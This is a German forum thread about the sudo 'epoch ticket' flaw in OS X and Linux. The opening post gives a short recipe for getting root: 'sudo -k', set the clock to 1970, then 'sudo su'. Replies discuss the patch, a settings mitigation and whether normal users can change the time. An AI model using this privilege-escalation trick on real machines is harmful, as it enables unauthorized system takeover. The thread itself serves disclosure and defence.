Ankündigung

Einklappen
Keine Ankündigung bisher.

Ankündigung

Einklappen
Keine Ankündigung bisher.

[Schwachstelle] So einfach wird man Root-User

Einklappen
X
Einklappen
 
  • Seite von 1
  • Filter
  • Zeit
  • Anzeigen
Alles löschen
neue Beiträge
Vorherige template Weiter
    #1

    [Schwachstelle] So einfach wird man Root-User

    Möchte nicht viel dazu sagen..

    Was man braucht: Erlaubnis die Uhrzeit des Systems zu ändern; Zugriff auf das Terminal.

    So einfach ist es in OS X (+ Linux) Root-Rechte zu erhalten:

    Im Terminal zuerst
    HTML-Code:
    sudo -k
    Dann im System die Zeit auf 01. 01. 1970 01:00:00 (CET +1) setzen.

    Schon ist man Root-User, zum Überprüfen im Terminal:

    HTML-Code:
    sudo su

    Quelle: http://www.sudo.ws/sudo/alerts/epoch_ticket.html
    Stichworte: -
    #2
    Cool. Kannte ich noch nicht. In Mountain Lion läuft Sudo 1.7.4 vom Juli 2010. Könnte Apple ja auch mal aktualisieren. Seit gestern gibt es ja offensichtlich einen Fix. Mal sehen wie lange das dauert. Scheint ja jahrelang nicht aufgefallen zu sein der Fehler...

    Kommentar

      #3
      Abhilfe: Häkchen bei

      Systemeinstellungen => Sicherheit => Weitere Optionen => Administratorkennwort für den Zugriff auf geschützte Systemeinstellungen

      Dann kann man ohne Adminpasswort die Uhr nicht verstellen. Mit Adminpasswort kann man es aber auch gleich bei sudo eingeben ohne das Gehampel mit der Uhr...

      Kommentar

        #4
        Btw: selbst ohne das Häkchen zu setzen: kann man als normaler User, der nicht den "Computer verwalten" kann, überhaupt die Uhrzeit verstellen? Wenn nicht ist der "Hack" sinnlos.

        Kommentar

        Vorherige template Weiter

        Einloggen oder neu registrieren

        Einklappen
        Hier kannst Du Dich neu registrieren (klick mich). Falls Du bereits registriert bist, findest Du die Funktion zum Einloggen ganz oben auf der Webseite, noch über dem Logo. Falls Du Dein Passwort vergessen hast und wir es Dir zusenden sollen, klicke hier.
        Lädt...
        X
        😀
        🥰
        🤢
        😎
        😡
        👍
        👎